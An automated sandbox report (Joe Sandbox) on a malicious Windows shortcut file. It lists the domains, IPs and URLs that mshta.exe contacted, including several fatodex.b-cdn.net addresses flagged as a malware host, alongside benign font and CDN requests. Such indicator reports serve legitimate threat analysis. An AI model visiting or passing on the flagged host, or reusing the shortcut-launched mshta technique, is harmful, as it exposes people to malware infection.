https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/css?family=Rubik:300,400,500,700,9000%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)0%VirustotalBrowse
https://bunny.net/v2/images/bunnynet-logo.svg...0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)0%VirustotalBrowse
https://bunnynetassets.b-cdn.net/error.png0%VirustotalBrowse
https://bunny.net/v2/images/bunnynet-logo.svgx...Th0%Avira URL Cloudsafe
https://fatodex.b-cdn.net/fatodex100%Avira URL Cloudmalware
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg)0%Avira URL Cloudsafe
https://fatodex.b-cdn.net/fatodexeEvent000%Avira URL Cloudsafe
http://fonts.bunny.net/0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff)0%Avira URL Cloudsafe
https://g.live.com/odclientsettings/Prod1C:0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff2)0%Avira URL Cloudsafe
https://fatodex.b-cdn.net/fatodex...)0%Avira URL Cloudsafe
https://bunnynetassets.b-cdn.net/error.css0%Avira URL Cloudsafe
https://fonts.bunny0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff2)0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/QV0%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svg...20%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff2)0%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svg70%Avira URL Cloudsafe
https://cdn.statuspage.io/se-v2.js0%Avira URL Cloudsafe
https://bunnycdn.com/xt0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssent0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff2)0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/EV0%Avira URL Cloudsafe
https://bunny.net/k0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff)0%Avira URL Cloudsafe
https://fatodex.b-cdn.net/fatodexG0%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svggs/0%Avira URL Cloudsafe
https://fatodex.b-cdn.net/fatodexH0%Avira URL Cloudsafe
https://fonts.bunny.net/css?family=Rubik0%Avira URL Cloudsafe
https://bunnynetassets.b-cdn.net/icons/bunny.svg0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff2)0%Avira URL Cloudsafe
https://bunny.net/U0%Avira URL Cloudsafe
https://fatodex.b-cdn.net/fatodex?100%Avira URL Cloudmalware
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgDAT0%Avira URL Cloudsafe
https://bunny.net/Q0%Avira URL Cloudsafe
https://fonts.bunny.net/H20%Avira URL Cloudsafe
https://fatodex.b-cdn.net/fatodexE0%Avira URL Cloudsafe
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bunnycdn.com
169.150.247.39
truefalseunknown
fatodex.b-cdn.net
138.199.37.232
truetrueunknown
bunnyfonts.b-cdn.net
169.150.236.104
truefalseunknown
bunny.net
169.150.247.38
truefalseunknown
bunnycdn.b-cdn.net
169.150.247.37
truefalseunknown
fonts.bunny.net
unknown
unknowntrueunknown
NameMaliciousAntivirus DetectionReputation
https://bunny.net/v2/images/bunnynet-logo.svgfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://fonts.bunny.net/css?family=Rubik:300,400,500,700,900false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/css?family=Rubik:300,400,500,700,900false
  • Avira URL Cloud: safe
unknown
https://fatodex.b-cdn.net/fatodextrue
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)css[1].css.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-7mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff)mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.b-cdn.net/mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff)mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.b-cdn.net/kmshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svgcss/unconfigured.cssentmshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff2)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);mshta.exe, 00000003.00000003.2167160063.0000024D3BBB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmp, unconfigured[1].css.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg2)xmshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css:mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svgroviderCmshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bmshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/lib/jquery/jquery.min.jsmshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff2)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssC:mshta.exe, 00000003.00000003.2167160063.0000024D3BBB6000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/mshta.exe, 00000003.00000002.3359913108.0000024D3BC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167160063.0000024D3BBAA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bunnynetassets.b-cdn.net/icons/arrow.svgmshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rmshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnynetassets.b-cdn.net/error.pngmshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fatodex.b-cdn.net/fatodexACmshta.exe, 00000003.00000002.3357203743.0000024538F9E000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)css[1].css.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)css[1].css.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svgqmshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgJmshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)css[1].css.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svg...mshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://crl.ver)svchost.exe, 00000005.00000002.3359616791.000001E64E610000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svgx...Thmshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg)mshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fatodex.b-cdn.net/fatodexeEvent00mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
http://fonts.bunny.net/mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff2)mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://g.live.com/odclientsettings/Prod1C:edb.log.5.drfalse
  • Avira URL Cloud: safe
unknown
https://fatodex.b-cdn.net/fatodex...)mshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://bunnynetassets.b-cdn.net/error.cssmshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunnymshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff2)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff2)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff2)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.b-cdn.net/QVmshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svg...2mshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff2)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff2)mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff2)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svg7mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://cdn.statuspage.io/se-v2.jsmshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.com/xtmshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssentmshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff2)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.b-cdn.net/EVmshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/kmshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff)mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svggs/mshta.exe, 00000003.00000002.3357203743.000002453902D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fatodex.b-cdn.net/fatodexGmshta.exe, 00000003.00000002.3357203743.0000024538F87000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://fatodex.b-cdn.net/fatodexHmshta.exe, 00000003.00000002.3357065102.0000024538F30000.00000004.00000800.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/css?family=Rubikmshta.exe, 00000003.00000002.3357203743.000002453904E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunnynetassets.b-cdn.net/icons/bunny.svgmshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff2)mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff2)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff2)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/Umshta.exe, 00000003.00000002.3359913108.0000024D3BC4A000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fatodex.b-cdn.net/fatodex?mshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgDATmshta.exe, 00000003.00000002.3357203743.0000024538F9E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/H2mshta.exe, 00000003.00000003.2167160063.0000024D3BBB6000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/Qmshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fatodex.b-cdn.net/fatodexEmshta.exe, 00000003.00000002.3359913108.0000024D3BB75000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...mshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svg...5s.mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff2)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff2)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnynetassets.b-cdn.net/icons/you.svgmshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-900-normal.woff2)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnynetassets.b-cdn.net/icons/x.svgmshta.exe, 00000003.00000002.3359913108.0000024D3BC32000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/gmshta.exe, 00000003.00000002.3359913108.0000024D3BC0F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunny.net/v2/images/bunnynet-logo.svg...ssumshta.exe, 00000003.00000002.3359913108.0000024D3BB50000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff2)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-arabic-300-normal.woff)css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-ext-500-normal.woff)mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
169.150.236.104
bunnyfonts.b-cdn.netUnited States
2711SPIRITTEL-ASUSfalse
169.150.247.38
bunny.netUnited States
2711SPIRITTEL-ASUSfalse
169.150.247.39
bunnycdn.comUnited States
2711SPIRITTEL-ASUSfalse
138.199.37.232
fatodex.b-cdn.netEuropean Union
51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRtrue
169.150.247.37
bunnycdn.b-cdn.netUnited States
2711SPIRITTEL-ASUSfalse
IP
127.0.0.1
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1512313
Start date and time:2024-09-17 08:31:11 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 24s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:PDp2UpMXz1.lnk
renamed because original name is a hash value
Original Sample Name:e22768aaf1e2f82438f62a41da5e664e127e492d93cb33f9a11e19f01c747333.lnk
Detection:MAL
Classification:mal100.winLNK@5/14@5/6
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .lnk
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 184.28.90.27
